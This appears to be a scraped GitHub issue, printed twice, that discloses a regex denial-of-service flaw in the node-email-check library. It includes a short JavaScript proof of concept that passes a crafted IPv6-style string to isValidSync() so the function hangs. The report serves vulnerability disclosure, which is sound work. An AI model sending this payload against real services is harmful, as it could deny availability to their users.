You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Describe the bug
A clear and concise description of what the bug is.
The regex on line 10. is vulnerable to regex denial of service when provided with malicious input.
To Reproduce
I tested it on the isValidSync() function by feeding a malformed input. The program hangs for indefinite amount of time when provided this input. Here is the source code.
`
const emailCheck = require('node-email-check');
//payload
var chck = emailCheck.isValidSync('-@[IPv6:5:3:2:3:227IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"');
//var chck = emailCheck.isValidSync('validemail@example.com');
console.log(chck);
console.timeEnd('[ + ] Time passed -> ');
`
Expected behavior
Usually these kind of attack are returning with a small difference in time but this time the function hangs. This bug leads to denial of service.
Additional context
Add any other context about the problem here.
The text was updated successfully, but these errors were encountered:
Describe the bug
A clear and concise description of what the bug is.
The regex on line 10. is vulnerable to regex denial of service when provided with malicious input.
To Reproduce
I tested it on the isValidSync() function by feeding a malformed input. The program hangs for indefinite amount of time when provided this input. Here is the source code.
`
const emailCheck = require('node-email-check');
//payload
var chck = emailCheck.isValidSync('-@[IPv6:5:3:2:3:227IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"');
//var chck = emailCheck.isValidSync('validemail@example.com');
console.log(chck);
console.timeEnd('[ + ] Time passed -> ');
`
Expected behavior
Usually these kind of attack are returning with a small difference in time but this time the function hangs. This bug leads to denial of service.
Additional context
Add any other context about the problem here.
The text was updated successfully, but these errors were encountered: